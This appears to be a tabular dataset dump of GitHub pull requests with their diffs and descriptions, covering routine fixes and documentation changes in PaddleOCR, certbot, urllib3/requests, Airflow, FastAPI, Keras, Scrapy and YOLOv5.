title
stringlengths 2
169
| diff
stringlengths 235
19.5k
| body
stringlengths 0
30.5k
| url
stringlengths 48
84
| created_at
stringlengths 20
20
| closed_at
stringlengths 20
20
| merged_at
stringlengths 20
20
| updated_at
stringlengths 20
20
| diff_len
float64 101
3.99k
| repo_name
stringclasses 83
values | __index_level_0__
int64 15
52.7k
|
|---|---|---|---|---|---|---|---|---|---|---|
update test_train_inference_python.sh
|
diff --git a/test_tipc/test_train_inference_python.sh b/test_tipc/test_train_inference_python.sh
index 0d4e182b28..c62b6274f8 100644
--- a/test_tipc/test_train_inference_python.sh
+++ b/test_tipc/test_train_inference_python.sh
@@ -244,7 +244,7 @@ else
export Count=0
USE_GPU_KEY=(${train_use_gpu_value})
for gpu in ${gpu_list[*]}; do
- use_gpu=${USE_GPU_KEY[Count]}
+ train_use_gpu=${USE_GPU_KEY[Count]}
Count=$(($Count + 1))
ips=""
if [ ${gpu} = "-1" ];then
@@ -302,11 +302,20 @@ else
set_pretrain=$(func_set_params "${pretrain_model_key}" "${pretrain_model_value}")
set_batchsize=$(func_set_params "${train_batch_key}" "${train_batch_value}")
set_train_params1=$(func_set_params "${train_param_key1}" "${train_param_value1}")
- set_use_gpu=$(func_set_params "${train_use_gpu_key}" "${use_gpu}")
- save_log="${LOG_PATH}/${trainer}_gpus_${gpu}_autocast_${autocast}"
-
+ set_use_gpu=$(func_set_params "${train_use_gpu_key}" "${train_use_gpu}")
+ if [ ${#ips} -le 26 ];then
+ save_log="${LOG_PATH}/${trainer}_gpus_${gpu}_autocast_${autocast}"
+ nodes=1
+ else
+ IFS=","
+ ips_array=(${ips})
+ IFS="|"
+ nodes=${#ips_array[@]}
+ save_log="${LOG_PATH}/${trainer}_gpus_${gpu}_autocast_${autocast}_nodes_${nodes}"
+ fi
+
# load pretrain from norm training if current trainer is pact or fpgm trainer
- if [ ${trainer} = ${pact_key} ] || [ ${trainer} = ${fpgm_key} ]; then
+ if ([ ${trainer} = ${pact_key} ] || [ ${trainer} = ${fpgm_key} ]) && [ ${nodes} -le 1 ]; then
set_pretrain="${load_norm_train_model}"
fi
@@ -325,7 +334,7 @@ else
set_eval_pretrain=$(func_set_params "${pretrain_model_key}" "${save_log}/${train_model_name}")
# save norm trained models to set pretrain for pact training and fpgm training
- if [ ${trainer} = ${trainer_norm} ]; then
+ if [ ${trainer} = ${trainer_norm} ] && [ ${nodes} -le 1]; then
load_norm_train_model=${set_eval_pretrain}
fi
# run eval
|
1) rename use_gpu -> train_use_gpu
2) add nodes at logname tail
3) multi node train: load same pretrain model
|
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/4597
|
2021-11-09T12:28:15Z
|
2021-11-10T06:41:10Z
|
2021-11-10T06:41:09Z
|
2021-11-10T06:41:10Z
| 617
|
PaddlePaddle/PaddleOCR
| 42,533
|
Run tests on apache-parser-v2
|
diff --git a/.travis.yml b/.travis.yml
index 86a475ca8be..baf3856042c 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -16,6 +16,9 @@ before_script:
# is a cap of on the number of simultaneous runs.
branches:
only:
+ # apache-parser-v2 is a temporary branch for doing work related to
+ # rewriting the parser in the Apache plugin.
+ - apache-parser-v2
- master
- /^\d+\.\d+\.x$/
- /^test-.*$/
@@ -24,9 +27,10 @@ branches:
not-on-master: ¬-on-master
if: NOT (type = push AND branch = master)
-# Jobs for the extended test suite are executed for cron jobs and pushes on non-master branches.
+# Jobs for the extended test suite are executed for cron jobs and pushes to
+# non-development branches. See the explanation for apache-parser-v2 above.
extended-test-suite: &extended-test-suite
- if: type = cron OR (type = push AND branch != master)
+ if: type = cron OR (type = push AND branch NOT IN (apache-parser-v2, master))
matrix:
include:
diff --git a/appveyor.yml b/appveyor.yml
index 3d58847f8dd..33f522df138 100644
--- a/appveyor.yml
+++ b/appveyor.yml
@@ -7,6 +7,9 @@ environment:
branches:
only:
+ # apache-parser-v2 is a temporary branch for doing work related to
+ # rewriting the parser in the Apache plugin.
+ - apache-parser-v2
- master
- /^\d+\.\d+\.x$/ # Version branches like X.X.X
- /^test-.*$/
|
We're planning on using the branch `apache-parser-v2` allowing us to incrementally work on the new Apache parser and feel comfortable landing temporary test code that we don't really want in `master`.
The `apache-parser-v2` branch is created and locked down, but neither Travis or AppVeyor are configured to run tests on it. See https://github.com/certbot/certbot/pull/7230. This PR fixes that problem.
This could probably just land in the `apache-parser-v2` branch, but why unnecessarily deviate the branch from `master`? It doesn't hurt anything there. Once it lands, I'll get this added to the `apache-parser-v2` branch too.
|
https://api.github.com/repos/certbot/certbot/pulls/7231
|
2019-07-10T19:40:52Z
|
2019-07-10T23:30:06Z
|
2019-07-10T23:30:06Z
|
2019-07-10T23:30:09Z
| 408
|
certbot/certbot
| 1,943
|
Updates urllib3 to 528ad3c
|
diff --git a/requests/packages/urllib3/__init__.py b/requests/packages/urllib3/__init__.py
index cdee528c94..4b36b5aeeb 100644
--- a/requests/packages/urllib3/__init__.py
+++ b/requests/packages/urllib3/__init__.py
@@ -57,7 +57,7 @@ def add_stderr_logger(level=logging.DEBUG):
# Set security warning to only go off once by default.
import warnings
-warnings.simplefilter('module', exceptions.InsecureRequestWarning)
+warnings.simplefilter('module', exceptions.SecurityWarning)
def disable_warnings(category=exceptions.HTTPWarning):
"""
diff --git a/requests/packages/urllib3/connection.py b/requests/packages/urllib3/connection.py
index 0d578d773b..c6e1959a2f 100644
--- a/requests/packages/urllib3/connection.py
+++ b/requests/packages/urllib3/connection.py
@@ -1,6 +1,8 @@
+import datetime
import sys
import socket
from socket import timeout as SocketTimeout
+import warnings
try: # Python 3
from http.client import HTTPConnection as _HTTPConnection, HTTPException
@@ -26,6 +28,7 @@ class BaseSSLError(BaseException):
from .exceptions import (
ConnectTimeoutError,
+ SystemTimeWarning,
)
from .packages.ssl_match_hostname import match_hostname
from .packages import six
@@ -45,6 +48,8 @@ class BaseSSLError(BaseException):
'https': 443,
}
+RECENT_DATE = datetime.date(2014, 1, 1)
+
class HTTPConnection(_HTTPConnection, object):
"""
@@ -172,6 +177,7 @@ class VerifiedHTTPSConnection(HTTPSConnection):
cert_reqs = None
ca_certs = None
ssl_version = None
+ assert_fingerprint = None
def set_cert(self, key_file=None, cert_file=None,
cert_reqs=None, ca_certs=None,
@@ -206,6 +212,14 @@ def connect(self):
# Override the host with the one we're requesting data from.
hostname = self._tunnel_host
+ is_time_off = datetime.date.today() < RECENT_DATE
+ if is_time_off:
+ warnings.warn((
+ 'System time is way off (before {0}). This will probably '
+ 'lead to SSL verification errors').format(RECENT_DATE),
+ SystemTimeWarning
+ )
+
# Wrap socket using verification with the root certs in
# trusted_root_certs
self.sock = ssl_wrap_socket(conn, self.key_file, self.cert_file,
@@ -214,15 +228,16 @@ def connect(self):
server_hostname=hostname,
ssl_version=resolved_ssl_version)
- if resolved_cert_reqs != ssl.CERT_NONE:
- if self.assert_fingerprint:
- assert_fingerprint(self.sock.getpeercert(binary_form=True),
- self.assert_fingerprint)
- elif self.assert_hostname is not False:
- match_hostname(self.sock.getpeercert(),
- self.assert_hostname or hostname)
+ if self.assert_fingerprint:
+ assert_fingerprint(self.sock.getpeercert(binary_form=True),
+ self.assert_fingerprint)
+ elif resolved_cert_reqs != ssl.CERT_NONE \
+ and self.assert_hostname is not False:
+ match_hostname(self.sock.getpeercert(),
+ self.assert_hostname or hostname)
- self.is_verified = resolved_cert_reqs == ssl.CERT_REQUIRED
+ self.is_verified = (resolved_cert_reqs == ssl.CERT_REQUIRED
+ or self.assert_fingerprint is not None)
if ssl:
diff --git a/requests/packages/urllib3/connectionpool.py b/requests/packages/urllib3/connectionpool.py
index 9317fdc369..9cc2a95541 100644
--- a/requests/packages/urllib3/connectionpool.py
+++ b/requests/packages/urllib3/connectionpool.py
@@ -718,7 +718,7 @@ def _validate_conn(self, conn):
super(HTTPSConnectionPool, self)._validate_conn(conn)
# Force connect early to allow us to validate the connection.
- if not conn.sock:
+ if not getattr(conn, 'sock', None): # AppEngine might not have `.sock`
conn.connect()
if not conn.is_verified:
diff --git a/requests/packages/urllib3/contrib/pyopenssl.py b/requests/packages/urllib3/contrib/pyopenssl.py
index 7a9ea2e7b9..24de9e4082 100644
--- a/requests/packages/urllib3/contrib/pyopenssl.py
+++ b/requests/packages/urllib3/contrib/pyopenssl.py
@@ -46,8 +46,12 @@
'''
-from ndg.httpsclient.ssl_peer_verification import SUBJ_ALT_NAME_SUPPORT
-from ndg.httpsclient.subj_alt_name import SubjectAltName as BaseSubjectAltName
+try:
+ from ndg.httpsclient.ssl_peer_verification import SUBJ_ALT_NAME_SUPPORT
+ from ndg.httpsclient.subj_alt_name import SubjectAltName as BaseSubjectAltName
+except SyntaxError as e:
+ raise ImportError(e)
+
import OpenSSL.SSL
from pyasn1.codec.der import decoder as der_decoder
from pyasn1.type import univ, constraint
@@ -155,18 +159,24 @@ def get_subj_alt_name(peer_cert):
class WrappedSocket(object):
- '''API-compatibility wrapper for Python OpenSSL's Connection-class.'''
+ '''API-compatibility wrapper for Python OpenSSL's Connection-class.
+
+ Note: _makefile_refs, _drop() and _reuse() are needed for the garbage
+ collector of pypy.
+ '''
def __init__(self, connection, socket, suppress_ragged_eofs=True):
self.connection = connection
self.socket = socket
self.suppress_ragged_eofs = suppress_ragged_eofs
+ self._makefile_refs = 0
def fileno(self):
return self.socket.fileno()
def makefile(self, mode, bufsize=-1):
- return _fileobject(self, mode, bufsize)
+ self._makefile_refs += 1
+ return _fileobject(self, mode, bufsize, close=True)
def recv(self, *args, **kwargs):
try:
@@ -180,7 +190,7 @@ def recv(self, *args, **kwargs):
rd, wd, ed = select.select(
[self.socket], [], [], self.socket.gettimeout())
if not rd:
- raise timeout()
+ raise timeout('The read operation timed out')
else:
return self.recv(*args, **kwargs)
else:
@@ -193,7 +203,10 @@ def sendall(self, data):
return self.connection.sendall(data)
def close(self):
- return self.connection.shutdown()
+ if self._makefile_refs < 1:
+ return self.connection.shutdown()
+ else:
+ self._makefile_refs -= 1
def getpeercert(self, binary_form=False):
x509 = self.connection.get_peer_certificate()
@@ -216,6 +229,15 @@ def getpeercert(self, binary_form=False):
]
}
+ def _reuse(self):
+ self._makefile_refs += 1
+
+ def _drop(self):
+ if self._makefile_refs < 1:
+ self.close()
+ else:
+ self._makefile_refs -= 1
+
def _verify_callback(cnx, x509, err_no, err_depth, return_code):
return err_no == 0
diff --git a/requests/packages/urllib3/exceptions.py b/requests/packages/urllib3/exceptions.py
index fff8bfa5d1..7519ba9805 100644
--- a/requests/packages/urllib3/exceptions.py
+++ b/requests/packages/urllib3/exceptions.py
@@ -60,7 +60,14 @@ class ProtocolError(HTTPError):
## Leaf Exceptions
class MaxRetryError(RequestError):
- "Raised when the maximum number of retries is exceeded."
+ """Raised when the maximum number of retries is exceeded.
+
+ :param pool: The connection pool
+ :type pool: :class:`~urllib3.connectionpool.HTTPConnectionPool`
+ :param string url: The requested Url
+ :param exceptions.Exception reason: The underlying error
+
+ """
def __init__(self, pool, url, reason=None):
self.reason = reason
@@ -134,6 +141,16 @@ def __init__(self, location):
self.location = location
-class InsecureRequestWarning(HTTPWarning):
+class SecurityWarning(HTTPWarning):
+ "Warned when perfoming security reducing actions"
+ pass
+
+
+class InsecureRequestWarning(SecurityWarning):
"Warned when making an unverified HTTPS request."
pass
+
+
+class SystemTimeWarning(SecurityWarning):
+ "Warned when system time is suspected to be wrong"
+ pass
diff --git a/requests/packages/urllib3/response.py b/requests/packages/urllib3/response.py
index 7e0d47faa3..e69de95733 100644
--- a/requests/packages/urllib3/response.py
+++ b/requests/packages/urllib3/response.py
@@ -48,7 +48,10 @@ class HTTPResponse(io.IOBase):
HTTP Response container.
Backwards-compatible to httplib's HTTPResponse but the response ``body`` is
- loaded and decoded on-demand when the ``data`` property is accessed.
+ loaded and decoded on-demand when the ``data`` property is accessed. This
+ class is also compatible with the Python standard library's :mod:`io`
+ module, and can hence be treated as a readable object in the context of that
+ framework.
Extra parameters for behaviour not present in httplib.HTTPResponse:
@@ -317,4 +320,14 @@ def flush(self):
return self._fp.flush()
def readable(self):
+ # This method is required for `io` module compatibility.
return True
+
+ def readinto(self, b):
+ # This method is required for `io` module compatibility.
+ temp = self.read(len(b))
+ if len(temp) == 0:
+ return 0
+ else:
+ b[:len(temp)] = temp
+ return len(temp)
diff --git a/requests/packages/urllib3/util/response.py b/requests/packages/urllib3/util/response.py
index d0325bc6b5..45fff55246 100644
--- a/requests/packages/urllib3/util/response.py
+++ b/requests/packages/urllib3/util/response.py
@@ -5,9 +5,18 @@ def is_fp_closed(obj):
:param obj:
The file-like object to check.
"""
- if hasattr(obj, 'fp'):
- # Object is a container for another file-like object that gets released
- # on exhaustion (e.g. HTTPResponse)
+
+ try:
+ # Check via the official file-like-object way.
+ return obj.closed
+ except AttributeError:
+ pass
+
+ try:
+ # Check if the object is a container for another file-like object that
+ # gets released on exhaustion (e.g. HTTPResponse).
return obj.fp is None
+ except AttributeError:
+ pass
- return obj.closed
+ raise ValueError("Unable to determine whether fp is closed.")
diff --git a/requests/packages/urllib3/util/retry.py b/requests/packages/urllib3/util/retry.py
index 90131977ac..eb560dfc08 100644
--- a/requests/packages/urllib3/util/retry.py
+++ b/requests/packages/urllib3/util/retry.py
@@ -83,7 +83,7 @@ class Retry(object):
same state). See :attr:`Retry.DEFAULT_METHOD_WHITELIST`.
:param iterable status_forcelist:
- A set of HTTP status codes that we should force a retry on.
+ A set of HTTP status codes that we should force a retry on.
By default, this is disabled with ``None``.
|
This includes fixes for openssl running with Pypy, so SSL connections can be
made if ndg-httpsclient, pyopenssl and pyasn1 are installed.
see also:
- https://github.com/shazow/urllib3/issues/449
- https://github.com/pypa/pip/issues/1988
|
https://api.github.com/repos/psf/requests/pulls/2179
|
2014-08-25T20:47:33Z
|
2014-08-26T19:10:51Z
|
2014-08-26T19:10:51Z
|
2021-09-08T11:00:48Z
| 2,716
|
psf/requests
| 32,572
|
Improve image building documentation for new users
|
diff --git a/docs/apache-airflow-providers/index.rst b/docs/apache-airflow-providers/index.rst
index 7329b7fd780a4..71c5132acdec8 100644
--- a/docs/apache-airflow-providers/index.rst
+++ b/docs/apache-airflow-providers/index.rst
@@ -21,6 +21,8 @@ Provider packages
.. contents:: :local:
+.. _providers:community-maintained-providers:
+
Community maintained providers
''''''''''''''''''''''''''''''
@@ -31,6 +33,9 @@ Those provider packages are separated per-provider (for example ``amazon``, ``go
etc.). Those packages are available as ``apache-airflow-providers`` packages - separately per each provider
(for example there is an ``apache-airflow-providers-amazon`` or ``apache-airflow-providers-google`` package).
+The full list of community managed providers is available at
+`Providers Index <https://airflow.apache.org/docs/#providers-packages-docs-apache-airflow-providers-index-html>`_.
+
You can install those provider packages separately in order to interface with a given service. For those
providers that have corresponding extras, the provider packages (latest version from PyPI) are installed
automatically when Airflow is installed with the extra.
diff --git a/docs/apache-airflow/start/docker-compose.yaml b/docs/apache-airflow/start/docker-compose.yaml
index 95796715fcc85..832092eec9e95 100644
--- a/docs/apache-airflow/start/docker-compose.yaml
+++ b/docs/apache-airflow/start/docker-compose.yaml
@@ -44,7 +44,11 @@
version: '3'
x-airflow-common:
&airflow-common
+ # In order to add custom dependencies or upgrade provider packages you can use your extended image.
+ # Comment the image line, place your Dockerfile in the directory where you placed the docker-compose.yaml
+ # and uncomment the "build" line below, Then run `docker-compose build` to build the images.
image: ${AIRFLOW_IMAGE_NAME:-apache/airflow:|version|}
+ # build: .
environment:
&airflow-common-env
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
@@ -60,7 +64,7 @@ x-airflow-common:
- ./dags:/opt/airflow/dags
- ./logs:/opt/airflow/logs
- ./plugins:/opt/airflow/plugins
- user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
+ user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-0}"
depends_on:
&airflow-common-depends-on
redis:
diff --git a/docs/apache-airflow/start/docker.rst b/docs/apache-airflow/start/docker.rst
index baea8ab2763ee..18fba4314bcef 100644
--- a/docs/apache-airflow/start/docker.rst
+++ b/docs/apache-airflow/start/docker.rst
@@ -81,6 +81,18 @@ If you need install a new Python library or system library, you can :doc:`build
.. _initializing_docker_compose_environment:
+Using custom images
+===================
+
+When you want to run Airflow locally, you might want to use an extended image, containing some additional dependencies - for
+example you might add new python packages, or upgrade airflow providers to a later version. This can be done very easily
+by placing a custom Dockerfile alongside your `docker-compose.yaml`. Then you can use `docker-compose build` command to build your image (you need to
+do it only once). You can also add the `--build` flag to your `docker-compose` commands to rebuild the images
+on-the-fly when you run other `docker-compose` commands.
+
+Examples of how you can extend the image with custom providers, python packages,
+apt packages and more can be found in :doc:`Building the image <docker-stack:build>`.
+
Initializing Environment
========================
diff --git a/docs/docker-stack/build.rst b/docs/docker-stack/build.rst
index 7d89f2fa23adf..c469a35dfc653 100644
--- a/docs/docker-stack/build.rst
+++ b/docs/docker-stack/build.rst
@@ -250,6 +250,19 @@ You should be aware, about a few things:
Examples of image extending
---------------------------
+Example of upgrading Airflow Provider packages
+..............................................
+
+The :ref:`Airflow Providers <providers:community-maintained-providers>` are released independently of core
+Airflow and sometimes you might want to upgrade specific providers only to fix some problems or
+use features available in that provider version. Here is an example of how you can do it
+
+.. exampleinclude:: docker-examples/extending/add-providers/Dockerfile
+ :language: Dockerfile
+ :start-after: [START Dockerfile]
+ :end-before: [END Dockerfile]
+
+
Example of adding ``apt`` package
.................................
diff --git a/docs/docker-stack/docker-examples/extending/add-apt-packages/Dockerfile b/docs/docker-stack/docker-examples/extending/add-apt-packages/Dockerfile
index 62de197973833..f11e87adc666d 100644
--- a/docs/docker-stack/docker-examples/extending/add-apt-packages/Dockerfile
+++ b/docs/docker-stack/docker-examples/extending/add-apt-packages/Dockerfile
@@ -15,7 +15,7 @@
# This is an example Dockerfile. It is not intended for PRODUCTION use
# [START Dockerfile]
-FROM apache/airflow
+FROM apache/airflow:2.1.2
USER root
RUN apt-get update \
&& apt-get install -y --no-install-recommends \
diff --git a/docs/docker-stack/docker-examples/extending/add-build-essential-extend/Dockerfile b/docs/docker-stack/docker-examples/extending/add-build-essential-extend/Dockerfile
index b34fdc9ab3cf8..47ac51ffbe07c 100644
--- a/docs/docker-stack/docker-examples/extending/add-build-essential-extend/Dockerfile
+++ b/docs/docker-stack/docker-examples/extending/add-build-essential-extend/Dockerfile
@@ -15,7 +15,7 @@
# This is an example Dockerfile. It is not intended for PRODUCTION use
# [START Dockerfile]
-FROM apache/airflow
+FROM apache/airflow:2.1.2
USER root
RUN apt-get update \
&& apt-get install -y --no-install-recommends \
diff --git a/docs/docker-stack/docker-examples/extending/add-providers/Dockerfile b/docs/docker-stack/docker-examples/extending/add-providers/Dockerfile
new file mode 100644
index 0000000000000..cdf7a42b0e41b
--- /dev/null
+++ b/docs/docker-stack/docker-examples/extending/add-providers/Dockerfile
@@ -0,0 +1,21 @@
+# Licensed to the Apache Software Foundation (ASF) under one or more
+# contributor license agreements. See the NOTICE file distributed with
+# this work for additional information regarding copyright ownership.
+# The ASF licenses this file to You under the Apache License, Version 2.0
+# (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+# This is an example Dockerfile. It is not intended for PRODUCTION use
+# [START Dockerfile]
+FROM apache/airflow:2.1.2
+RUN pip install --no-cache-dir apache-airflow-providers-docker==2.1.0
+# [END Dockerfile]
+
diff --git a/docs/docker-stack/docker-examples/extending/add-pypi-packages/Dockerfile b/docs/docker-stack/docker-examples/extending/add-pypi-packages/Dockerfile
index cc2559f79d062..310f84cf68dc8 100644
--- a/docs/docker-stack/docker-examples/extending/add-pypi-packages/Dockerfile
+++ b/docs/docker-stack/docker-examples/extending/add-pypi-packages/Dockerfile
@@ -15,6 +15,6 @@
# This is an example Dockerfile. It is not intended for PRODUCTION use
# [START Dockerfile]
-FROM apache/airflow
+FROM apache/airflow:2.1.2
RUN pip install --no-cache-dir lxml
# [END Dockerfile]
diff --git a/docs/docker-stack/docker-examples/extending/embedding-dags/Dockerfile b/docs/docker-stack/docker-examples/extending/embedding-dags/Dockerfile
index c849697859fb2..48701aae23d87 100644
--- a/docs/docker-stack/docker-examples/extending/embedding-dags/Dockerfile
+++ b/docs/docker-stack/docker-examples/extending/embedding-dags/Dockerfile
@@ -15,7 +15,7 @@
# This is an example Dockerfile. It is not intended for PRODUCTION use
# [START Dockerfile]
-FROM apache/airflow
+FROM apache/airflow:2.1.2
COPY --chown=airflow:root test_dag.py /opt/airflow/dags
diff --git a/docs/docker-stack/docker-examples/extending/writable-directory/Dockerfile b/docs/docker-stack/docker-examples/extending/writable-directory/Dockerfile
index ba07f6816888f..8fbb98dfef00c 100644
--- a/docs/docker-stack/docker-examples/extending/writable-directory/Dockerfile
+++ b/docs/docker-stack/docker-examples/extending/writable-directory/Dockerfile
@@ -15,7 +15,7 @@
# This is an example Dockerfile. It is not intended for PRODUCTION use
# [START Dockerfile]
-FROM apache/airflow
+FROM apache/airflow:2.1.2
RUN umask 0002; \
mkdir -p ~/writeable-directory
# [END Dockerfile]
|
This PR improves documentation for building images of airflow,
specifically targetting users who do not have big experience with
building the images. It shows examples on how custom image building
can be easily used to upgrade provider packages as well as how
image building can be easily integrated in quick-start using
docker-compose.
<!--
Thank you for contributing! Please make sure that your code changes
are covered with tests. And in case of new features or big changes
remember to adjust the documentation.
Feel free to ping committers for the review!
In case of existing issue, reference it using one of the following:
closes: #ISSUE
related: #ISSUE
How to write a good git commit message:
http://chris.beams.io/posts/git-commit/
-->
---
**^ Add meaningful description above**
Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/main/CONTRIBUTING.rst#pull-request-guidelines)** for more information.
In case of fundamental code change, Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)) is needed.
In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
In case of backwards incompatible changes please leave a note in [UPDATING.md](https://github.com/apache/airflow/blob/main/UPDATING.md).
|
https://api.github.com/repos/apache/airflow/pulls/17409
|
2021-08-04T10:52:46Z
|
2021-08-04T21:07:22Z
|
2021-08-04T21:07:22Z
|
2021-08-04T21:07:23Z
| 2,259
|
apache/airflow
| 14,826
|
🐛 Fix using `Annotated` in routers or path operations decorated multiple times
|
diff --git a/fastapi/dependencies/utils.py b/fastapi/dependencies/utils.py
index c581348c9d26c..f131001ce2c9f 100644
--- a/fastapi/dependencies/utils.py
+++ b/fastapi/dependencies/utils.py
@@ -1,7 +1,7 @@
import dataclasses
import inspect
from contextlib import contextmanager
-from copy import deepcopy
+from copy import copy, deepcopy
from typing import (
Any,
Callable,
@@ -383,7 +383,8 @@ def analyze_param(
), f"Cannot specify multiple `Annotated` FastAPI arguments for {param_name!r}"
fastapi_annotation = next(iter(fastapi_annotations), None)
if isinstance(fastapi_annotation, FieldInfo):
- field_info = fastapi_annotation
+ # Copy `field_info` because we mutate `field_info.default` below.
+ field_info = copy(fastapi_annotation)
assert field_info.default is Undefined or field_info.default is Required, (
f"`{field_info.__class__.__name__}` default value cannot be set in"
f" `Annotated` for {param_name!r}. Set the default value with `=` instead."
diff --git a/tests/test_annotated.py b/tests/test_annotated.py
index 556019897a53e..30c8efe014065 100644
--- a/tests/test_annotated.py
+++ b/tests/test_annotated.py
@@ -1,5 +1,5 @@
import pytest
-from fastapi import FastAPI, Query
+from fastapi import APIRouter, FastAPI, Query
from fastapi.testclient import TestClient
from typing_extensions import Annotated
@@ -224,3 +224,44 @@ def test_get(path, expected_status, expected_response):
response = client.get(path)
assert response.status_code == expected_status
assert response.json() == expected_response
+
+
+def test_multiple_path():
+ @app.get("/test1")
+ @app.get("/test2")
+ async def test(var: Annotated[str, Query()] = "bar"):
+ return {"foo": var}
+
+ response = client.get("/test1")
+ assert response.status_code == 200
+ assert response.json() == {"foo": "bar"}
+
+ response = client.get("/test1", params={"var": "baz"})
+ assert response.status_code == 200
+ assert response.json() == {"foo": "baz"}
+
+ response = client.get("/test2")
+ assert response.status_code == 200
+ assert response.json() == {"foo": "bar"}
+
+ response = client.get("/test2", params={"var": "baz"})
+ assert response.status_code == 200
+ assert response.json() == {"foo": "baz"}
+
+
+def test_nested_router():
+ app = FastAPI()
+
+ router = APIRouter(prefix="/nested")
+
+ @router.get("/test")
+ async def test(var: Annotated[str, Query()] = "bar"):
+ return {"foo": var}
+
+ app.include_router(router)
+
+ client = TestClient(app)
+
+ response = client.get("/nested/test")
+ assert response.status_code == 200
+ assert response.json() == {"foo": "bar"}
|
We need to deep clone the field_info to prevent ourself from mutating it. This allows multiple path or nested routers ,etc.
Should solve those discussions:
https://github.com/tiangolo/fastapi/discussions/9279
https://github.com/tiangolo/fastapi/discussions/9309
https://github.com/tiangolo/fastapi/discussions/9306
|
https://api.github.com/repos/tiangolo/fastapi/pulls/9315
|
2023-03-26T11:42:57Z
|
2023-04-13T17:49:23Z
|
2023-04-13T17:49:23Z
|
2023-04-13T20:43:06Z
| 725
|
tiangolo/fastapi
| 23,048
|
call : remove train arg from doc string
|
diff --git a/keras/engine/topology.py b/keras/engine/topology.py
index a6d3d08aa68..aa74db292c9 100644
--- a/keras/engine/topology.py
+++ b/keras/engine/topology.py
@@ -409,8 +409,6 @@ def call(self, x, mask=None):
# Arguments
x: input tensor, or list/tuple of input tensors.
- train: boolean, whether the layer should behave
- in train behavior (e.g. dropout on) or test behavior.
mask: a masking tensor (or list of tensors). Used mainly in RNNs.
# Returns:
|
https://api.github.com/repos/keras-team/keras/pulls/2235
|
2016-04-08T10:10:07Z
|
2016-04-08T15:59:56Z
|
2016-04-08T15:59:56Z
|
2016-08-09T22:05:59Z
| 151
|
keras-team/keras
| 47,768
|
|
[HttpCompressionMiddleware] fix delimiter for Accept-Encoding header
|
diff --git a/scrapy/downloadermiddlewares/httpcompression.py b/scrapy/downloadermiddlewares/httpcompression.py
index 65b65295365..0010b2a8f2a 100644
--- a/scrapy/downloadermiddlewares/httpcompression.py
+++ b/scrapy/downloadermiddlewares/httpcompression.py
@@ -26,7 +26,7 @@ def from_crawler(cls, crawler):
def process_request(self, request, spider):
request.headers.setdefault('Accept-Encoding',
- b",".join(ACCEPTED_ENCODINGS))
+ b", ".join(ACCEPTED_ENCODINGS))
def process_response(self, request, response, spider):
diff --git a/tests/test_downloadermiddleware_httpcompression.py b/tests/test_downloadermiddleware_httpcompression.py
index c6a823b535c..64488841a29 100644
--- a/tests/test_downloadermiddleware_httpcompression.py
+++ b/tests/test_downloadermiddleware_httpcompression.py
@@ -48,7 +48,7 @@ def _getresponse(self, coding):
}
response = Response('http://scrapytest.org/', body=body, headers=headers)
- response.request = Request('http://scrapytest.org', headers={'Accept-Encoding': 'gzip,deflate'})
+ response.request = Request('http://scrapytest.org', headers={'Accept-Encoding': 'gzip, deflate'})
return response
def test_process_request(self):
@@ -56,7 +56,7 @@ def test_process_request(self):
assert 'Accept-Encoding' not in request.headers
self.mw.process_request(request, self.spider)
self.assertEqual(request.headers.get('Accept-Encoding'),
- b','.join(ACCEPTED_ENCODINGS))
+ b', '.join(ACCEPTED_ENCODINGS))
def test_process_response_gzip(self):
response = self._getresponse('gzip')
|
Accept-Encoding header should have `, ` (with space) as a delimiter between encodings instead of `,` (non space) (https://tools.ietf.org/html/rfc2616#section-14.3)
|
https://api.github.com/repos/scrapy/scrapy/pulls/4293
|
2020-01-29T13:06:55Z
|
2020-01-29T19:19:41Z
|
2020-01-29T19:19:41Z
|
2020-01-29T19:19:41Z
| 395
|
scrapy/scrapy
| 34,370
|
CIoU protected divides
|
diff --git a/utils/metrics.py b/utils/metrics.py
index e17747b703f..858af23efad 100644
--- a/utils/metrics.py
+++ b/utils/metrics.py
@@ -225,8 +225,8 @@ def bbox_iou(box1, box2, xywh=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-7
else: # x1, y1, x2, y2 = box1
b1_x1, b1_y1, b1_x2, b1_y2 = box1.chunk(4, 1)
b2_x1, b2_y1, b2_x2, b2_y2 = box2.chunk(4, 1)
- w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps
- w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps
+ w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1
+ w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1
# Intersection area
inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \
@@ -244,7 +244,7 @@ def bbox_iou(box1, box2, xywh=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-7
c2 = cw ** 2 + ch ** 2 + eps # convex diagonal squared
rho2 = ((b2_x1 + b2_x2 - b1_x1 - b1_x2) ** 2 + (b2_y1 + b2_y2 - b1_y1 - b1_y2) ** 2) / 4 # center dist ** 2
if CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
- v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)
+ v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / (h2 + eps)) - torch.atan(w1 / (h1 + eps)), 2)
with torch.no_grad():
alpha = v / (v - iou + (1 + eps))
return iou - (rho2 / c2 + v * alpha) # CIoU
|
Protected divides in IOU function to resolve https://github.com/ultralytics/yolov5/issues/8539
## 🛠️ PR Summary
<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub>
### 🌟 Summary
